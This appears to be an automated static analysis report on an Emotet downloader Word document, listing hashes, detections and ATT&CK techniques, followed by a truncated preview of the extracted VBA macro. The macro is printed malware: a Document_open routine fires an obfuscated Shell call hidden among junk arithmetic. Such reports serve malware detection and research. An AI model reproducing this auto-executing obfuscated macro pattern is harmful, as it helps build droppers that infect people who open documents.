Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 b4abe520f3daffba…

MALICIOUS

Office (OLE)

Size: 360.2 KB · Created: 2018-07-19 18:04:00 · Authoring application: Microsoft Office Word · First seen: 2018-09-04
MD5: 9c61d510e88b4cf8874af78cf7c48d46
SHA-1: 0c2c98554d13c0e4fb84e4623cb07cb9acf8e647
SHA-256: b4abe520f3daffba8d806780ec85dc2b1e4e26874632ab2daa4f44ee83f27fda
Risk score: 182

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6878773-0. Static analysis detected critical heuristics for VBA macros and the use of the Shell() function, indicating the document is designed to execute arbitrary code. The presence of a Document_Open macro further suggests automatic execution when the document is opened. Together these factors strongly point to downloader or dropper functionality, characteristic of the Emotet family.

Heuristics (5)

  • ClamAV: Doc.Downloader.Emotet-6878773-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6878773-0
  • VBA macros detected [medium] (2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45147 bytes
SHA-256: 5554df0d3e63dfa79980fc94857f44a90d9e1975fec21cde35f9ca05d0d8777a

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "WAFpXPOCFcW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function jjqNJQXbLLSUT()
On Error Resume Next
   bcZpK = (qBijop - MAQMGw / 92206 * 11477 - (66352 - zEhOaj * YrOiY - iJZhp + NXwYC - uXnWAv))
   bEzPk = (UHEIn - cbilK / 63351 * 7233 - (77625 - AidDj * cMEds - NiTwo + dMFvpO - TNFEb))
   fIHbT = (Vjkdu - MjYKqX / 54694 * 37807 - (59009 - iSQaV * BBpFB - fIwka + NwGkOj - vnAcz))
   jckdiQ = (hKwbB - whDjOG / 88545 * 39858 - (47864 - fiPfI * CrSOf - GYvDZ + jMAzBL - pkpmpW))
End Function
Private Function CMtkcaiTlRfiw()
On Error Resume Next
   JWoXzk = (DSmjF - vShkpt / 14249 * 61777 - (55283 - jouszM * WHmYwF - SalAvX + CjsRTm - vRfzhl))
   BkcvA = (pqSAbU - osQXFj / 17322 * 33415 - (17021 - wEmUY * qpQBR - CKswb + wwfMUJ - rGKQF))
   RZRNp = (LwjrLh - OKfEMC / 77797 * 62059 - (11376 - hlthi * pZKFW - WmnowF + oPjop - OjXiVp))
   zLbnHA = (qokntz - wDuJaN / 30507 * 23994 - (61349 - RSdhF * hUHTZD - cbqXV + zpjjo - NlUYlL))
   CrFrVQ = (SWzMu - PIGkF / 81950 * 63129 - (9855 - afZHa * HYRUij - tvEBi + QVUHsW - JYPbuX))
End Function
Private Function vbWWLBtruAiu()
On Error Resume Next
   tNOsFq = (wIivz - pdsXF / 64349 * 29785 - (55011 - TTRCwA * YAwYG - jBMKB + sOvLO - wqtzE))
   LLifSY = (jDSuwP - ELYpR / 60598 * 31500 - (74502 - tiIYT * hjEBa - XhRIw + sWfcmE - QYEirh))
   zkzJz = (RWmqup - jiHhU / 95377 * 45125 - (30424 - RwEYCt * BNUwcZ - TwwFbA + mrOnkt - zWkGIQ))
   WmYYww = (JkmOTI - janXV / 30832 * 74654 - (18286 - NMRQbl * CKBNPU - jLzaU + cawXiT - VkdUI))
   zLoWs = (cGEsOz - FXIdV / 49420 * 44579 - (33936 - zadnk * KvKTC - QuPFP + HpXdHL - nTmWJV))
   UNuub = (tGYjh - YFSwqL / 90922 * 60625 - (29496 - RXHCiz * iZwKK - JlHkHH + UiOOpS - tCnIIz))
End Function
Private Sub Document_open()
On Error Resume Next
   zqurA = (cKKqzQ - GrswKp / 86044 * 78005 - (88296 - rEmSzk * dKMtQ - HPaQH + smzVqw - aFGYrO))
   zuIih = (wOOnl - MiUDu / 12412 * 72379 - (65435 - wwRoqO * mDcuX - wOLBHb + jICdwl - EoTEQN))
   fXHQzj = (FFYdlW - DtYoQT / 11783 * 36276 - (70377 - fjAJJL * ViMjDO - DBRBEt + oVmvP - utPiM))
   IaoWWA = (XCAKD - pdPUp / 3086 * 66629 - (25930 - DhFYRI * wbjRz - aWwAl + HKSuZ - RzJkjK))
   lQjnw = (jHDKwA - tlOCEO / 82099 * 41946 - (83706 - NNtzz * ShTQuu - SdFLNJ + KovlTJ - Nawwwt))
Shell "" + mOJiZmN + spWlikY + CVar("c") + BBsjvTAKSXlUf + EdLHcYFZM + cJBPWsdXBhX + XXizIlA + SscqLlUVJ + tjoLOtazWrf + wiSMFw + vaiXiziVmCw + woSuFiHVm + RmSYlbzB + tNVZUcBN + IhdIha + oSJwvuswSWa + OJdEJuM + OrMEmlpvIWs + VJOPinzj + NBXUh + VYcwKOtEf + JYwsO + icbRN + Cuifkcijkww + wDdMHAZRHf, 0
   BJNdzv = (CjuUN - wMWti / 40193 * 63533 - (17445 - CflhC * CQUPqj - fknAY + jOpnFP - upkfv))
   FHVUvA = (wDDQid - iJLBUK / 66348 * 79388 - (54194 - SmmEwI * OujfVJ - owRAU + mwjHSP - GLdOQ))
   hGirS = (UzTZEW - ihlFi / 92385 * 88941 - (49124 - NsjRt * NjoUsS - YBvhfS + vPiiwb - DfzzD))
End Sub
Private Function QvTRwHIFUKjo()
On Error Resume Next
   PwrLnT = (FuMcY - WuwOLs / 74215 * 9713 - (1198 - zwQat * jXNOIQ - cLjaF + wKrcDk - YNnFi))
   lKoXtT = (oilniP - tzXIW / 5428 * 52809 - (43534 - JMkAw * nSWbs - jSbjsn + ljFsL - VJQts))
   OBiKI = (qnqSQ - WiJiv / 48892 * 56870 - (29065 - kZEUZw * rWZirY - ioRaZ + OvQolp - LfUUP))
   XorKE = (BvFGZz - hnEVl / 66335 * 59705 - (32238 - iCnKTN * aVmPp - tHwcM + pQVtba - OGnCP))
   jJnJoI = (vBNPC - nEdCPS / 72264 * 61228 - (73332 - GtpRzI * NKIWLj - fUUXUu + BtXUA - HTWczz))
   fuNXt = (ROpPJ - GYVCiR / 63805 * 17669 - (3247 - GVMpU * SkIjh - qiwJj + ikVcSY - ACKJnz))
End Function
Private Function VRSqHIzNzGiM()
On Error Resume Next
   fqjlf = (rBYDn - JPlHVj / 16264 * 37724 - (50261 - SlczqK * OsBiC - KViUKm + Arvmc - bvmtlv))
   iMZGu = (izzwqH - aRmcZq / 30234 * 42241 - (87990 - HpIIl * covmbN - VCazAj + LGfTt - HPciE))
   mSQmiw = (WKvVP - UQZwt / 28537 * 79045 - (56950 - AKoPP * NLNhrd - CloPE + tBLJDj
... (truncated)